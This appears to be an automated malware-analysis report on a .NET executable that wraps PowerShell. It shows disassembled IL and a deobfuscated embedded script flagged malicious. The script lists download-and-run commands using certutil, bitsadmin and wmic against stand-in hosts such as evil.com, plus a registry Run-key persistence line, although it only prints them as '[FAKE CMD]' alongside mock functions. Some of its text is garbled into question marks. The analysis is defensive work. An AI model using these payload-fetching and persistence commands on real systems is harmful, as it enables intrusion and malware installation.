System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldstr Out-String callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddCommand(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldstr Stream callvirt System.Management.Automation.PowerShell System.Management.Automation.PowerShell::AddParameter(System.String) pop <null> ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh ldloc.s V_5 ldloc.s V_7 ldnull <null> ldloc.s V_28 brtrue.s IL_0594: ldloc.s V_28 ldloc.s V_29 ldftn System.Void ModuleNameSpace.MainApp/<>c__DisplayClass8::<Main>b__4(System.IAsyncResult) newobj System.Void System.AsyncCallback::.ctor(System.Object,System.IntPtr) stloc.s V_28 ldloc.s V_28 ldnull <null> callvirt System.IAsyncResult System.Management.Automation.PowerShell::BeginInvoke<System.String,System.Management.Automation.PSObject>(System.Management.Automation.PSDataCollection`1<System.String>,System.Management.Automation.PSDataCollection`1<System.Management.Automation.PSObject>,System.Management.Automation.PSInvocationSettings,System.AsyncCallback,System.Object) pop <null> ldloc.0 <null> callvirt System.Boolean ModuleNameSpace.MainApp::get_ShouldExit() brtrue.s IL_05B5: ldloc.s V_24 ldloc.s V_29 ldfld System.Threading.ManualResetEvent ModuleNameSpace.MainApp/<>c__DisplayClass8::mre ldc.i4.s 100 callvirt System.Boolean System.Threading.WaitHandle::WaitOne(System.Int32) brfalse.s IL_059D: ldloc.0 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Void System.Management.Automation.PowerShell::Stop() ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt 
System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Management.Automation.PSInvocationState System.Management.Automation.PSInvocationStateInfo::get_State() ldc.i4.5 <null> bne.un.s IL_05F7: leave.s IL_060F ldloc.s V_29 ldfld ModuleNameSpace.MainModuleUI ModuleNameSpace.MainApp/<>c__DisplayClass8::ui ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Management.Automation.PSInvocationStateInfo System.Management.Automation.PowerShell::get_InvocationStateInfo() callvirt System.Exception System.Management.Automation.PSInvocationStateInfo::get_Reason() callvirt System.String System.Exception::get_Message() callvirt System.Void System.Management.Automation.Host.PSHostUserInterface::WriteErrorLine(System.String) leave.s IL_060F: ldloc.s V_4 ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh brfalse.s IL_060E: endfinally ldloc.s V_24 ldfld System.Management.Automation.PowerShell ModuleNameSpace.MainApp/<>c__DisplayClassb::posh callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_4 callvirt System.Void System.Management.Automation.Runspaces.Runspace::Close() leave.s IL_0624: leave.s IL_0640 ldloc.s V_4 brfalse.s IL_0623: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0640: ldloc.1 stloc.s V_25 ldstr An exception occured: call System.Void System.Console::Write(System.String) ldloc.s V_25 callvirt System.String System.Exception::get_Message() call System.Void System.Console::WriteLine(System.String) leave.s IL_0640: ldloc.1 ldloc.1 <null> brfalse.s IL_0653: ldloc.0 ldstr Hit any key to exit... 
call System.Void System.Console::WriteLine(System.String) call System.ConsoleKeyInfo System.Console::ReadKey() pop <null> ldloc.0 <null> callvirt System.Int32 ModuleNameSpace.MainApp::get_ExitCode() ret <null> ldloc.s V_30 ret <null> |

| Name0 | Value |
|---|---|
| PE Layout | MemoryMapped (process dump suspected) |
| Deobfuscated PowerShell | @("certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\Windows\Temp\payload.exe", "bitsadmin /transfer myjob /download /priority normal http://evil.com/backdoor.exe C:\temp\svchost.exe", "wmic process get brief /format:"http://malicious-server.com/trojan.xsl"", "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\malware.exe" /f") foreach ($cmd in $suspiciousCommands) { Write-Host "[FAKE CMD] $cmd" -ForegroundColor "DarkYellow" } Write-Host "[!] ???????????????????????????? CMD ?????????????? '??????????????????'" -ForegroundColor "Red" disable-antivirusmock add-totaskschedulermock new-fakesystemfolder new-fakesvchost encrypt-fakefolder fake-miner rename-tosvchost invoke-suspiciouscmd Write-Host " [???????????????????????? ??????????????????] ?????? ??????-?????????????? ??????????????????!" -ForegroundColor "White" -BackgroundColor "DarkGreen" |
| PE Layout | MemoryMapped (process dump suspected) |

| Name0 | Value | Location |
|---|---|---|
| PE Layout | MemoryMapped (process dump suspected) | 8fb788ba54fadf27b7597680b2d7ac6d |
| Deobfuscated PowerShell | @("certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\Windows\Temp\payload.exe", "bitsadmin /transfer myjob /download /priority normal http://evil.com/backdoor.exe C:\temp\svchost.exe", "wmic process get brief /format:"http://malicious-server.com/trojan.xsl"", "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\malware.exe" /f") foreach ($cmd in $suspiciousCommands) { Write-Host "[FAKE CMD] $cmd" -ForegroundColor "DarkYellow" } Write-Host "[!] ???????????????????????????? CMD ?????????????? '??????????????????'" -ForegroundColor "Red" disable-antivirusmock add-totaskschedulermock new-fakesystemfolder new-fakesvchost encrypt-fakefolder fake-miner rename-tosvchost invoke-suspiciouscmd Write-Host " [???????????????????????? ??????????????????] ?????? ??????-?????????????? ??????????????????!" -ForegroundColor "White" -BackgroundColor "DarkGreen" Malicious | 8fb788ba54fadf27b7597680b2d7ac6d > .Net Resources > power9.ps1 > [PowerShell Command] |
| PE Layout | MemoryMapped (process dump suspected) | 8fb788ba54fadf27b7597680b2d7ac6d > [Rebuild from dump]_438a2ed1.exe |